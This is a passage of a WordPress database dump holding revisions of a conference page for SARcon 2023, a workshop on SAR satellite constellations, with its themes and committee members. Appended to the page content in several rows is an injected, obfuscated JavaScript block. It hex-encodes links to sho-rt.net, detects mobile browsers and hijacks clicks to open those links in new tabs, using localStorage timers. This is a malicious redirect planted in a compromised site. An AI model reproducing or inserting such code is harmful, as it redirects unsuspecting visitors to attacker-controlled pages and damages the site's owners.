_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 18:04:18','2022-10-13 18:04:18','',2736,'https://gsw2023.com/?p=2759',0,'revision','',0),
(2760,1,'2022-10-13 18:06:32','2022-10-13 18:06:32','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" image_paddings=\"20px 0px 0px 0px\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"47\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"full\" parallax_content=\"parallax_content_value\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" css=\".vc_custom_1665716543449{background-image: url(https://gsw2023.com/wp-content/uploads/2018/06/trade08.jpg?id=1897) !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #E3E3E3), color-stop(84%, #EBEBEB));background: -moz-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -webkit-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -o-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -ms-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);\"][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 18:06:32','2022-10-13 18:06:32','',2736,'https://gsw2023.com/?p=2760',0,'revision','',0),
(2761,1,'2022-10-13 18:09:47','2022-10-13 18:09:47','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"47\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"full\" parallax_content=\"parallax_content_value\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" css=\".vc_custom_1665716543449{background-image: url(https://gsw2023.com/wp-content/uploads/2018/06/trade08.jpg?id=1897) !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #E3E3E3), color-stop(84%, #EBEBEB));background: -moz-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -webkit-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -o-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -ms-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: linear-gradient(top,#E3E3E3 0%,#EBEBEB 